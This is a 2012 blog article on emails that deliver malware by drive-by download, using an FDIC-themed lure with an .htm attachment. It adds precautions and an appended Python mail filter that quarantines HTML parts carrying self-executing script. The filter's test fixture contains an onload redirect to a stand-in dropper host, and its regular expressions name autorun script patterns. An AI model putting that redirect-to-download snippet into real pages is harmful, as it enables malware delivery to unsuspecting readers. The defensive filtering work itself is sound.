Wednesday, February 1, 2012

‘Drive-by-Download’ Malware Attacks Now Delivered via Email

There’s a good chance you’ve been advised not to click links or open file attachments in emails from unknown (and untrusted) sources.

Otherwise, you may wind up with a nasty virus or worm wreaking havoc on your computer, stealing data, displaying advertisements or possibly granting an attacker remote control of your machine. And that’s just the tip of the iceberg.

In recent years, security professionals have also warned users to remain vigilant and tread the internet carefully. Ignoring that advice can lead to the same results, only with the malware delivered by drive-by download rather than by email.

Drive-by downloads are silent attacks carried out when a user visits a seemingly innocuous website whose code exploits a vulnerability in the visitor’s browser, a browser plugin or the operating system in order to install malware. Unless the PC is fully patched and protected by antivirus, there is a strong chance the machine will be infected on the spot, without any action by, or knowledge of, the user.

Now users have another danger to look out for: drive-by-downloads delivered by email.

Researchers at Eleven, an email security firm based in Germany, have discovered a sinister email campaign that downloads malware when the emails are opened (or potentially previewed) in the email client.

“Previous malware e-mails required the user to click on a link or open an attachment for the PC to be infected,” the company wrote in a press release issued last week. “The new generation of e-mail-borne malware consists of HTML e-mails which contain a JavaScript which automatically downloads malware when the e-mail is opened.”

According to Eleven, the spam messages currently harboring this new threat are rigged to appear as if they’re coming from the Federal Deposit Insurance Corporation (FDIC), complete with a spoofed sender’s address at

Drive-by Download Email

Subject: Banking security update
Dear clients,

Your Wire and ACH transactions have been temporarily suspended. Please open the attached document for more information.

Best regards,
Online security department
Federal Deposit Insurance Corporation

Attached file: Suspended_Bank_Account_N8465797.htm

If the target’s email client renders the HTML, or the recipient opens the attached .htm file in a browser, the embedded JavaScript executes and attempts to download malware onto the PC. All the user sees in the meantime is a message reading “Loading…Please wait…”

Protecting Your Computer from ‘Drive-by’ Emails

In light of this new threat, users are being advised to take the following precautions:

  • Change your email client’s preferences so that HTML emails are not rendered automatically and, where possible, display messages in plain text only. The attack is only carried out if the HTML is rendered, so a message shown as plain text cannot run the script. Treat .htm and .html attachments in unsolicited mail the same way you would an unknown executable: do not open them.

  • Make sure that mail reaching your client has passed through a comprehensive spam and malware filter, one that inspects HTML bodies and HTML attachments rather than only executable attachments, since the payload in this campaign is script, not a binary.

  • Verify that your PC is patched with any necessary system updates and protected by antivirus software. Also be sure to double-check that the antivirus definitions are current.
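What a mail filter has to look for in this campaign, as an added example that is not part of the original article or of Eleven’s product: the script below parses a message, walks its MIME parts, and quarantines any HTML body or .htm/.html attachment that carries an inline `<script>` element, a load-time event handler, or a call that navigates the page without a click. The two messages it scans are constructed for the example (the lure is modelled on the FDIC-themed sample above, with a harmless stand-in where the real script would be, and the host names are reserved `.test` names); the regular expressions are a reasonable starting heuristic, not a complete parser.

```python
import email
import re
from email import policy

# Constructed sample, modelled on the FDIC-themed lure quoted in the article.
# The attachment body is a harmless stand-in that only mimics the shape of the
# described attack (a "Loading..." decoy plus script that fires on render); it
# is not the real payload, and the host name is a reserved .test name.
LURE_EML = b"""From: Federal Deposit Insurance Corporation <alerts@example.test>
To: victim@example.test
Subject: Banking security update
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="BOUNDARY"

--BOUNDARY
Content-Type: text/plain; charset="us-ascii"

Dear clients,

Your Wire and ACH transactions have been temporarily suspended. Please open
the attached document for more information.

--BOUNDARY
Content-Type: text/html; name="Suspended_Bank_Account_N8465797.htm"
Content-Disposition: attachment; filename="Suspended_Bank_Account_N8465797.htm"
Content-Transfer-Encoding: 7bit

<html><body onload="go()">
<p>Loading...Please wait...</p>
<script>
function go() { window.location.href = "http://dropper.example.test/update.exe"; }
</script>
</body></html>
--BOUNDARY--
"""

# Constructed control: an ordinary HTML message with no script, which the
# filter must keep delivering (blocking all HTML mail is not the goal).
NEWSLETTER_EML = b"""From: news@example.test
To: victim@example.test
Subject: Monthly statement is ready
MIME-Version: 1.0
Content-Type: text/html; charset="us-ascii"

<html><body><p>Your statement is ready. <a href="https://bank.example.test/login">Log in</a></p></body></html>
"""

HTML_TYPES = {"text/html", "application/xhtml+xml"}
HTML_EXTS = (".htm", ".html", ".xhtml")

# Script that can run without the reader clicking anything: an inline <script>
# element, a load-time event handler, or a call that navigates or redirects.
SCRIPT_TAG = re.compile(rb"<script\b", re.IGNORECASE)
AUTORUN = re.compile(
    rb"\bon(?:load|error|pageshow)\s*=|\bsetTimeout\s*\(|"
    rb"\blocation\s*(?:\.\s*(?:href|replace|assign)|=)|"
    rb"\bdocument\.write\s*\(|\bwindow\.open\s*\(",
    re.IGNORECASE,
)


def is_html_part(part):
    """True for any leaf part that a mail client or browser would render as HTML,
    whether it is declared text/html or merely carries an .htm/.html filename."""
    name = (part.get_filename() or "").lower()
    return part.get_content_type() in HTML_TYPES or name.endswith(HTML_EXTS)


def scan_message(raw):
    """Return one finding per HTML part that carries self-executing script."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.is_multipart() or not is_html_part(part):
            continue
        body = part.get_payload(decode=True) or b""  # decoded bytes of this part
        reasons = []
        if SCRIPT_TAG.search(body):
            reasons.append("inline <script> in HTML part")
        if AUTORUN.search(body):
            reasons.append("script fires on load or navigates without a click")
        if reasons and part.get_content_disposition() == "attachment":
            reasons.append("delivered as an HTML attachment (opens in the browser)")
        if reasons:
            findings.append({
                "filename": part.get_filename(),
                "content_type": part.get_content_type(),
                "reasons": reasons,
            })
    return findings


def verdict(raw):
    """Gateway decision: quarantine anything carrying self-executing script."""
    return "quarantine" if scan_message(raw) else "deliver"


if __name__ == "__main__":
    for label, raw in (("lure", LURE_EML), ("newsletter", NEWSLETTER_EML)):
        print(label, verdict(raw), scan_message(raw))
```

The check deliberately keys on the filename as well as the declared content type, because an attachment labelled `application/octet-stream` but named `.htm` still opens in the browser when double-clicked. Run on the lure it returns `quarantine` with all three reasons on the `Suspended_Bank_Account_N8465797.htm` part; the script-free newsletter is delivered unchanged.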

